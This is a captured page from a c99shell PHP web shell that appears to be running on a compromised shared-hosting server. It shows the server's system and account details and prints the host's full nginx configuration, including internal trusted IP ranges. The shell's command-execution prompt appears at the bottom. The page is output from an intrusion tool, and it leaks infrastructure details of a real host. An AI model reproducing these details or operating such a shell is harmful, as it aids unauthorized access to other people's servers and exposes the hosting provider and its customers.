Software: Apache/2.4.68 (Linux) PHP/7.4.33. PHP/7.4.33 uname -a: Linux bjb2293782.nichost.ru 6.6.151-1.el8.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Aug 10 uid=12584(bjb2293782) gid=12584(bjb2293782) groups=12584(bjb2293782) Safe-mode: OFF (not secure) /etc/nginx/conf.auto.d/ drwxr-xr-x | |
| Viewing file: Select action/file-type: load_module "/usr/lib64/nginx/modules/ngx_http_htpasswd_module.so";
load_module "/usr/lib64/nginx/modules/ngx_stream_module.so";
worker_processes 2;
error_log /var/log/nginx/error.log;
pid /var/run/nginx.pid;
events {
worker_connections 1024;
}
http {
map $http_x_forwarded_proto $thescheme {
default $scheme;
https https;
}
set_real_ip_from 10.1.0.0/16;
set_real_ip_from 10.3.0.0/16;
set_real_ip_from 10.12.0.0/16;
set_real_ip_from 10.52.0.0/14;
set_real_ip_from 31.177.93.0/24;
set_real_ip_from 195.208.0.0/23;
real_ip_header X-Real-IP;
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
ssl_ciphers EECDH+ECDSA+AESGCM:EECDH+aRSA+AESGCM:EECDH+ECDSA+SHA384:EECDH+ECDSA+SHA256EECDH+aRSA+SHA384:EECDH+aRSA+SHA256:EECDH:EDH+aRSA:!RC4:!aNULL:!eNULL:!LOW:!3DES:!MD5:!EXP:!PSK:!SRP:!DSS:!DHE;
ssl_prefer_server_ciphers on;
ssl_session_cache shared:SSL:10m;
ssl_session_timeout 10m;
include /usr/share/nginx/mime.types;
default_type application/octet-stream;
client_body_temp_path /tmp/nginx;
proxy_temp_path /tmp/nginx/proxy;
fastcgi_temp_path /tmp/nginx/fastcgi;
uwsgi_temp_path /tmp/nginx/uwsgi;
scgi_temp_path /tmp/nginx/scgi;
server_names_hash_bucket_size 256;
sendfile on;
keepalive_timeout 65;
server {
listen 0.0.0.0:80;
server_name _default_;
location / {
root /usr/share/webpages/freeze/;
log_not_found off;
}
}
}
|
:: Command execute :: | |
--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0043 ]-- |